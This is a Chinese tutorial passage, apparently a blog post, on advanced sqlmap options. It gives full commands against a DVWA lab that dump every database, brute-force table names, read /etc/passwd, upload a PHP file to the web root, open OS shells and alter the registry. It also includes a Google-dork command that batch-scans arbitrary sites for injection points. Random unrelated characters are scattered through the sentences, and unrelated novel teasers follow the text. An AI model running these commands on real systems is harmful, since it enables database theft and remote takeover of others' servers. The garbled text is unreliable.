sqlmap其它參數(shù)1

--batch 不詢問用戶選擇庶溶,全部使用默認選項

sqlmap.py -g "inurl:\".php?id=1\"" --proxy="http://127.0.0.1:25378" --batch ?使用此條語句可以批量掃描注入點


--count 獲取表中的數(shù)據(jù)個數(shù),一些敏感數(shù)據(jù)不能讀時可以使用此參數(shù)

root@kali:~# sqlmap -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=fiuptcba82h53qu2fqngtj9oj1" --count -D dvwa


--privileges 列出數(shù)據(jù)庫管理員權限机错,-U指定用戶(CU是當前用戶)

root@kali:~# sqlmap -u "http://192.168.80.161/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=16da84d6c533f3e25354fcf87c1310b0" --privileges -U CU


--dump-all ?獲取所有數(shù)據(jù)庫表的內(nèi)容

--exclude-sysdbs ?排除數(shù)據(jù)庫自帶的系統(tǒng)庫

root@kali:~# sqlmap -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=fiuptcba82h53qu2fqngtj9oj1" --dump-all --exclude-sysdbs

dump數(shù)據(jù)后,sqlmap為每個表生成一個CSV文件父腕。


--common-tables 暴力破解表名

以下3種情況弱匪,可以暴力破解表名:

? ? Mysql<5.0,沒有information_schema庫

? ? Mysql>=5.0璧亮,無權讀取information_schema庫

? ? 微軟的access數(shù)據(jù)庫萧诫,默認無權讀取MSysObjects庫

默認的字典文件 /usr/share/sqlmap/txt/common-tables.txt,可以手工指定

root@kali:~# sqlmap -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=fiuptcba82h53qu2fqngtj9oj1" --common-tables -D dvwa


--common-columns ?暴力破解列名

默認的字典文件/usr/share/sqlmap/txt/common-columns.txt

root@kali:~# sqlmap -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=fiuptcba82h53qu2fqngtj9oj1" --common-columns -T users -D dvwa


--udf-inject 注入用戶自定義函數(shù)

--shared-lib=SHLIB 共享庫的本地路徑

當我們需要在服務器上執(zhí)行系統(tǒng)命令時枝嘶,sqlmap默認會把DBMS內(nèi)置的庫文件經(jīng)過編譯后帘饶,上傳到服務器上,在服務器上基于編譯后的庫文件進行自定義函數(shù)的編寫群扶,編寫的自定義函數(shù)就是我們通常所說的UDF及刻。利用UDF實現(xiàn)對目標服務器特殊功能的操作,例如執(zhí)行系統(tǒng)命令等竞阐。

不同操作系統(tǒng)動態(tài)鏈接庫不同缴饭。windows是dll、linux是shared object

MYSQL的版本不同udf導出的路徑不同:

小于5.1版本:c:/windows

大于5.1版本:../lib/plugin


--file-read? 從數(shù)據(jù)庫服務器中讀取文件

root@kali:~# sqlmap -u "http://192.168.80.161/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=16da84d6c533f3e25354fcf87c1310b0" --file-read="/etc/passwd"

讀取后骆莹,保存到本機/root/.sqlmap/output/192.168.80.161/files/_etc_passwd


--file-write颗搂、--file-dest? 把文件上傳到數(shù)據(jù)庫服務器中

sqlmap.py -u "http://192.168.80.33/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=4pq76dua60ghqc807869jrb9v2" --file-write="d:/dante.php" --file-dest="C:/phpStudy/WWW/dvwa/dante.php"


--sql-shell ?執(zhí)行數(shù)據(jù)庫命令

--os-shell、--os-cmd ?執(zhí)行操作系統(tǒng)命令

Mysql和postgresql汪疮,sqlmap上傳一個二進制庫峭火,并生成自定義函數(shù)sys_exec()、sys_eval()智嚷,也就是UDF卖丸。

Mssql,sqlmap調(diào)用xp_cmdshell存儲過程盏道,在SQL Server 2005及以上版本默認禁制xp_cmdshell稍浆,sqlmap會重新啟用它,如果不存在猜嘱,會自動創(chuàng)建衅枫。

root@kali:~# sqlmap -u "http://192.168.80.22/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=di9fbv68slla7sb0nncrm0v5m1" --os-cmd="ipconfig"

root@kali:~# sqlmap -u "http://192.168.80.22/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=di9fbv68slla7sb0nncrm0v5m1" --os-shell


--reg-read 讀取注冊表值

--reg-add 寫入注冊表值

--reg-del 刪除注冊表值

--reg-key,--reg-value朗伶,--reg-data弦撩,--reg-type 注冊表輔助選項

sqlmap -u http://1.1.1.1/a.php?id=1 --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1

最后編輯于
?著作權歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個濱河市论皆,隨后出現(xiàn)的幾起案子益楼,更是在濱河造成了極大的恐慌猾漫,老刑警劉巖,帶你破解...
    沈念sama閱讀 211,123評論 6 490
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件感凤,死亡現(xiàn)場離奇詭異悯周,居然都是意外死亡,警方通過查閱死者的電腦和手機陪竿,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,031評論 2 384
  • 文/潘曉璐 我一進店門禽翼,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人族跛,你說我怎么就攤上這事闰挡。” “怎么了庸蔼?”我有些...
    開封第一講書人閱讀 156,723評論 0 345
  • 文/不壞的土叔 我叫張陵解总,是天一觀的道長。 經(jīng)常有香客問我姐仅,道長花枫,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 56,357評論 1 283
  • 正文 為了忘掉前任掏膏,我火速辦了婚禮劳翰,結果婚禮上,老公的妹妹穿的比我還像新娘馒疹。我一直安慰自己佳簸,他們只是感情好,可當我...
    茶點故事閱讀 65,412評論 5 384
  • 文/花漫 我一把揭開白布颖变。 她就那樣靜靜地躺著生均,像睡著了一般。 火紅的嫁衣襯著肌膚如雪腥刹。 梳的紋絲不亂的頭發(fā)上马胧,一...
    開封第一講書人閱讀 49,760評論 1 289
  • 那天,我揣著相機與錄音衔峰,去河邊找鬼佩脊。 笑死,一個胖子當著我的面吹牛垫卤,可吹牛的內(nèi)容都是我干的威彰。 我是一名探鬼主播,決...
    沈念sama閱讀 38,904評論 3 405
  • 文/蒼蘭香墨 我猛地睜開眼穴肘,長吁一口氣:“原來是場噩夢啊……” “哼歇盼!你這毒婦竟也來了?” 一聲冷哼從身側響起评抚,我...
    開封第一講書人閱讀 37,672評論 0 266
  • 序言:老撾萬榮一對情侶失蹤旺遮,失蹤者是張志新(化名)和其女友劉穎赵讯,沒想到半個月后盈咳,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體耿眉,經(jīng)...
    沈念sama閱讀 44,118評論 1 303
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 36,456評論 2 325
  • 正文 我和宋清朗相戀三年鱼响,在試婚紗的時候發(fā)現(xiàn)自己被綠了鸣剪。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點故事閱讀 38,599評論 1 340
  • 序言:一個原本活蹦亂跳的男人離奇死亡丈积,死狀恐怖筐骇,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情江滨,我是刑警寧澤铛纬,帶...
    沈念sama閱讀 34,264評論 4 328
  • 正文 年R本政府宣布,位于F島的核電站唬滑,受9級特大地震影響告唆,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜晶密,卻給世界環(huán)境...
    茶點故事閱讀 39,857評論 3 312
  • 文/蒙蒙 一擒悬、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧稻艰,春花似錦懂牧、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,731評論 0 21
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽。三九已至元扔,卻和暖如春躯保,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背摇展。 一陣腳步聲響...
    開封第一講書人閱讀 31,956評論 1 264
  • 我被黑心中介騙來泰國打工吻氧, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留,地道東北人咏连。 一個月前我還...
    沈念sama閱讀 46,286評論 2 360
  • 正文 我出身青樓盯孙,卻偏偏與公主長得像,于是被迫代替她去往敵國和親祟滴。 傳聞我的和親對象是個殘疾皇子振惰,可洞房花燭夜當晚...
    茶點故事閱讀 43,465評論 2 348

推薦閱讀更多精彩內(nèi)容